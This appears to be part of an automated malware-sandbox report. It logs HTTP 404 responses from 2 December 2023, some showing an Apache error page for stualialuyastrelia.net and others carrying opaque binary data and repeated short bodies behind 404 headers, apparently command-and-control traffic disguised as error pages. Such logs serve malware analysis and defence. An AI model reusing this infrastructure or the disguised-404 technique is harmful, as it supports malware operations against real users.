                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 02 Dec 2023 01:06:45 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 74 75 61 6c 69 61 6c 75 79 61 73 74 72 65 6c 69 61 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at stualialuyastrelia.net Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 02 Dec 2023 01:06:45 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 36 36 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 e5 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 db fa 6a c6 86 04 12 fc 2a 54 e9 30 f6 c7 35 f3 73 07 03 d2 1f f9 d8 fa e0 b3 89 71 cd 37 33 33 d1 68 73 45 7c 1f 57 44 8d e8 be 3c 50 35 51 fe 08 22 b9 7f 18 66 3d 28 2a 87 6a dd d6 be db 43 11 5c 53 a6 cd f6 4d 55 64 91 54 5b fd 55 19 d0 ed 05 70 b1 17 22 58 4a 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 23 be 42 15 d7 07 53 53 fa cb 1f 9e 1d 09 52 2b b5 c8 83 7b 32 44 f4 ff f9 f8 78 bf c4 0d 13 13 bf 1e e1 92 c4 08 4c c4 08 a0 c1 a1 61 80 dc f5 69 d7 23 17 7e 5f af 9a 9f c8 c9 a0 c1 a9 dd 7a 0d 80 4d 19 e0 2c d5 a9 18 0a f5 96 be 27 51 61 9f d4 3f 7c 88 28 c8 48 6e a1 c1 4a 9a 03 fd ec 9e fa 46 ac 87 2b bd 61 00 1a 59 bf 44 34 fd 79 12 6c 23 6c 29 6c 0a 8d c7 fd f4 0e a4 fb 7e 71 eb 80 f5 1a 78 9b 4a d8 19 ae cc 4f 3b 79 82 ae 0c 96 01 4c 49 56 ad f3 57 9b 11 b9 fa 4d cd 23 b2 75 0e 31 79 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 92 0e ff 9d 7f 7f 55 40 17 23 7b 39 26 e7 ac 04 28 84 42 40 77 9b c7 9b 84 f7 3d 66 15 8b 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e 82 01 e8 e4 1f 5e a1 90 4e a1 54 55 8b fa d2 63 1b c3 cb 29 e4 d4 e5 5b 1e 44 ab 1e 26 83 13 ee c3 ca 57 a3 4c 1d 85 1f d4 5c 68 91 9c 29 06 f1 0c 5e ae 63 75 81 7e 90 c7 7d 10 9f d8 3e e1 b0 99 17 9a 8a cd fe 7f 74 79 52 6e 43 cc b9 8b 8b e1 62 7a d7 9c 88 c3 e0 6b a9 b4 7b 2f 08 64 5a b1 ae 46 1f 58 02 ab 7a 8f 56 50 e3 cd 74 d8 37 00 9c e0 1c c9 20 f5 52 48 c4 3a 96 4d cb e7 17 7f dc e5 3e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 0e 93 81 19 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 02 Dec 2023 01:06:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 74 75 61 6c 69 61 6c 75 79 61 73 74 72 65 6c 69 61 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at stualialuyastrelia.net Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 02 Dec 2023 01:06:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 36 36 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 ed 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 db fa 6a c6 86 04 12 fc 2a 54 e9 30 f6 c7 35 f3 73 07 03 d2 1f f9 d8 fa e0 b3 89 71 cd 37 33 33 d1 68 73 45 7c 1f 57 44 8d e8 be 3c 50 35 51 fe 08 22 b9 7f 18 66 3d 28 2a 87 6a dd d6 be db 43 11 5c 53 a6 cd f6 4d 55 64 91 54 5b fd 55 19 d0 ed 05 70 b1 17 22 58 4a 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 23 be 42 15 d7 07 53 53 aa 8e 1f 9e 51 08 51 2b c6 6c ff 1f 7e 45 f7 ff 78 8d 55 db 24 0d 10 12 b4 1f eb 92 24 5e 52 c5 03 21 f1 a1 61 7e de f5 23 35 19 17 7e 4f af 9a a5 34 d4 a0 c1 b9 9d 7a 0d 80 4e 19 e0 2e 95 a9 1d 1a f4 96 be 25 51 61 9f d4 3f 7c 88 28 c8 48 6b 11 97 4a 9a 07 fd ec 94 b5 64 ac 85 2f bd e0 0d c0 4d bf 46 24 fd f8 12 6c 23 6c 29 6c 0a 8d c7 fd e4 0e b4 eb 7e 71 eb 80 f5 1a 68 9b 4a d8 69 f7 d1 4f 07 79 82 ae 9c 97 54 4c fd f5 ac f3 57 3b 2a b9 72 ee cc 23 b2 75 0e 31 79 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 c2 49 ff 9d 3f 7f 55 40 57 64 7b 39 66 e7 ac 04 28 94 42 40 9f 9a c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e 82 01 e8 e4 31 2a c4 e8 3a a1 54 55 77 da aa 1b 6f d3 cb 29 32 7e fa 5b 1e 50 ab 1e 26 7d 11 ee c3 ce 57 a3 4c 1d 85 1f f4 5c 68 f1 b2 4d 67 85 4d 5e ae 03 93 62 27 e4 a6 0d 0d 9f 10 a3 d9 b0 99 5d 84 8a cd e4 7f 74 79 50 6d 43 cc b9 8b 8b a1 62 7a 17 b2 fa b0 92 48 a9 b4 bb 89 d9 16 28 d2 ae 10 1f d0 05 ab 7a 8f 82 76 e3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 08 c4 3a d6 4d cb e7 17 3f dc e5 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 0e 93 81 19 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 02 Dec 2023 01:06:47 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 74 75 61 6c 69 61 6c 75 79 61 73 74 72 65 6c 69 61 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at stualialuyastrelia.net Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 02 Dec 2023 01:06:47 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 1c 81 1e cb 46 d7 f8 14 a2 25 bf 29 46 16 36 e4 69 1e 2b 85 56 2d 0e 61 9f bd 8c ac 0d 0a 30 0d 0a 0d 0a Data Ascii: 2fUys/~(`:F%)F6i+V-a0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 02 Dec 2023 01:06:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 74 75 61 6c 69 61 6c 75 79 61 73 74 72 65 6c 69 61 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at stualialuyastrelia.net Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 02 Dec 2023 01:07:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 74 75 61 6c 69 61 6c 75 79 61 73 74 72 65 6c 69 61 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at stualialuyastrelia.net Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 02 Dec 2023 01:08:09 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 02 Dec 2023 01:08:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 02 Dec 2023 01:08:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 02 Dec 2023 01:08:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 02 Dec 2023 01:08:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 02 Dec 2023 01:08:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 02 Dec 2023 01:08:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 02 Dec 2023 01:08:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 02 Dec 2023 01:08:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 02 Dec 2023 01:08:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 02 Dec 2023 01:08:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 02 Dec 2023 01:08:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 02 Dec 2023 01:08:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 02 Dec 2023 01:08:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 02 Dec 2023 01:08:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 02 Dec 2023 01:08:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 02 Dec 2023 01:08:21 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 02 Dec 2023 01:08:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 02 Dec 2023 01:08:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
